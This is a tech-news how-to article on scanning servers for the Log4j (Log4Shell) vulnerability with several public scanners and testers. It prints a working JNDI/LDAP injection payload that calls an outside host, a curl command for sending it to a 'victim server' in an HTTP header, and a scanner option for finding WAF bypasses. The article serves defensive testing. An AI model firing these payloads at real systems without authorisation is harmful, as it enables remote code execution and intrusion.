Saturday, February 4, 2023
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory
  • Login
  • Register
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • How-Tos
    • Troubleshooting
No Result
View All Result
Cloud7 News
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • How-Tos
    • Troubleshooting
No Result
View All Result
Cloud7 News
No Result
View All Result

Home > How-Tos > How to scan your server for Log4j (Log4Shell) vulnerability

How to scan your server for Log4j (Log4Shell) vulnerability

The Apache Log4j vulnerability impacted hundreds of millions of devices. The IT and security teams of the enterprises are trying to discovered if their systems are affected.


Ugur Kubilay Cam Ugur Kubilay Cam
December 16, 2021
5 min read
How to scan your server for Log4j (Log4Shell) vulnerability

Log4j is a widely used software library for logging security and performance information. Security experts discovered a Zero-day vulnerability in the popular library, affecting many enterprise IT systems. Several vendors have released different tools, but a second vulnerability is discovered after a short time. The Apache Software Foundation has pushed out a new fix after that. If your system has any Java application using a version of Log4j before 2.14.1, you should act very quickly. You can scan your system to check the Log4j vulnerability with the following tools quickly.

Tip: You can follow the updated list and solutions of the applications or systems affected by the Log4j vulnerability here. (The list is constantly updated)

Table of Contents

  • Apache Log4j CVE-2021-44228 Scanner
    • Usage
  • CISA Log4j Scanner
    • Usage
  • Huntress Labs log4shell tester
    • Usage
  • Trend Micro Log4j Vulnerability Tester
  • Usage

Apache Log4j CVE-2021-44228 Scanner

apache log4j cve 2021-44228 scanner

Scanning your system to check for the Apache Log4j vulnerability is very easy. All you have to do is executing the open-source tool: Apache Log4j CVE-2021-44228 developed by Adil Soybali, a security researcher from Seccops Cyber Security Technologies Inc.

Features

  • Scanning according to the URL list you provide.
  • Scanning by finding the subdomains of the provided domain name.
  • Adding the source domain as a prefix to determine from which source the incoming DNS queries are coming.

Requirements

  • httpx
  • curl

Installation

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.git
cd Log4j-RCE-Scanner
chmod +x log4j-rce-scanner.sh

Usage

./log4j-rce-scanner.sh -h

This will display help for the tool. Here are all the switches it supports.

-h, --help - Display help
-l, --url-list - List of domain/subdomain/ip to be used for scanning.
-d, --domain - The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid - Burp collabrator client id address or interactsh domain address.

Example uses:
./log4j-rce-scanner.sh -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
./log4j-rce-scanner.sh -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
If the domain is vulnerable, DNS callbacks with the vulnerable domain name is sent to the burp collaborator or interactsh address you provided.
Log4j Log4shell Scanner Setup
Log4j Log4shell Scanner Setup
  • Burp collaborator documentation page
  • Easy way to set up a custom Burp Collaborator instance in a docker environment
  • Interactsh

Official GitHub Repository

  • https://github.com/adilsoybali/Log4j-RCE-Scanner

CISA Log4j Scanner

https://github.com/cisagov/log4j-scanner

This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository is provided “as is” and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community. This is not intended to be a 100% true positive solution; False negatives may occur.

cisa log4j scanner

Usage

Scan a Single URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

Discover WAF bypasses on the environment.

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

Scan a list of URLs

$ python3 log4j-scan.py -l urls.txt

Huntress Labs log4shell tester

https://log4shell.huntress.com

This tester provides a payload with a unique identifier and accepts LDAP connections from vulnerable apps and displays the IP address receiving connections. The sample code (payload) mentioned bottom can also be used to test this out.

Usage

You simply copy and paste the generated JNDI syntax (payload) (the code block ${jndi[:]ldap[:]//.... presented below) into anything (application input boxes, frontend site form fields, logins such as username inputs, or if you are a bit more technical, even User-Agent or X-Forwarded-For or other customizable HTTP headers).

Sample Code (Payload):

${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}

How to send the Log4j payload to the victim server?

  1. You can send the payload to the victim server using a user agent switcher extension on your web browser.
  2. You can also send a curl request to the victim server via the Linux terminal.
curl http://vulnerable-app:8080 \ -H 'X-Api-Version: ${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url}'


Trend Micro Log4j Vulnerability Tester

log4j-tester.trendmicro.com

Usage

Watch the video below on how to use the Log4J tester.


Related Stories

  • Two new vulnerabilities are found on Log4j, only one of them is fixed yet
  • CISA published an emergency directive for Log4j
  • Google joining the war against Log4j exploits
  • Hackers exploit Log4j to inject Monero miners, shifting from LDAP to RMI
  • A third, new Apache Log4j vulnerability is discovered
  • The Log4j flaw is patched but it is still vulnerable
  • CISA published Log4j vulnerability guidance
  • Zero-day Apache Log4j RCE vulnerability (Log4Shell) is being exploited
Tags: Vulnerability
Ugur Kubilay Cam

Ugur Kubilay Cam

Ugur Kubilay Cam is the content marketing specialist of Cloud7 News. In addition to being an SEO expert, Ugur Kubilay is a Python developer and cybersecurity researcher. Ugur has a Bachelor's degree and a master's degree in Data Analysis. With more than 15 years of experience, Ugur Kubilay Cam is an active Linux user and administrator.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

I agree to the Terms & Conditions and Privacy Policy.

Next Post
Telstra expanding its network infrastructure in the U.S.

Telstra expanding its network infrastructure in the U.S.

Related News

How to enable UEFI in VMware Workstation

How to enable UEFI in VMware Workstation

February 4, 2023 10:00 am
LockBit encryptor source code is updated

LockBit encryptor source code is updated

February 3, 2023 4:40 pm
Fortinet is expanding its SOC offerings portfolio

Fortinet is expanding its SOC offerings portfolio

February 3, 2023 2:00 pm
Radware announces a new partner program

Radware announces a new partner program

February 3, 2023 1:30 pm
Get free daily newsletters from Cloud7 News Get the Cloud7 Newsletter
Select list(s):

Check your inbox or spam folder to confirm your subscription.

By subscribing, you agree to our
Copyright Policy and Privacy Policy

Get the free newsletter

Subscribe to receive the latest IT business updates straight to your inbox.

Select list(s):

Check your inbox or spam folder to confirm your subscription.

Editor's Choice

What’s new in Linux kernel 6.2 rc6?

10 Best Web Hosting Services of 2023

Ubuntu 22.04 LTS is available for download. What is new?

CERN and Fermilab recommend AlmaLinux

7 best hosting control panels of 2023

How to update Linux Kernel without rebooting?

7 best Linux mail servers of 2023

7 best cPanel alternatives for 2023

7 best Linux web browsers for 2023

7 best CentOS alternatives

7 best Linux server distros of 2023

Interview with Igor Seletskiy on AlmaLinux

How to create a VM on VMware Workstation

Recent News

  • Best Ubuntu alternatives for desktop of 2023
  • How to enable UEFI in VMware Workstation
  • LockBit encryptor source code is updated
  • LibreOffice 7.5 Community is released. What’s new?
  • NTT to add Palo Alto Networks’ solution to its portfolio

Cloud7 News
Cloud7 is a news source that publishes the latest news, reviews, comparisons, opinions, and exclusive interviews to help tech users of high-experience levels in the IT industry.

EXPLORE

  • Web Hosting
  • Cloud Computing
  • Data Center
  • Cybersecurity
  • Linux
  • Network/Internet
  • Software
  • Hardware
  • How-Tos
  • Troubleshooting

RESOURCES

  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory

Get the Cloud7 Newsletter

Get FREE daily newsletters from Cloud7 delivering the latest news and reviews.

  • About
  • Privacy & Policy
  • Copyright Policy
  • Contact

© 2023, Cloud7 News. All rights reserved.

No Result
View All Result
  • Cloud Computing
  • Web Hosting
  • Data Center
  • Linux
  • Cybersecurity
  • More
    • Network/Internet
    • Windows
    • Software
    • Hardware
    • Blockchain
    • Policy/Legislation
    • How-Tos
    • Troubleshooting
  • Events
  • Interviews
  • Jobs
  • Opinion
  • Whitepapers
  • Glossary
  • Community Forum
  • Web Hosting Directory

© 2023, Cloud7 News. All rights reserved.

Welcome Back!

Sign In with Facebook
Sign In with Google
Sign In with Linked In
OR

Login to your account below

Forgotten Password? Sign Up

Create New Account!

Sign Up with Facebook
Sign Up with Google
Sign Up with Linked In
OR

Fill the forms below to register

*By registering into our website, you agree to the Terms & Conditions and Privacy Policy.
All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In
This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy and Cookie Policy.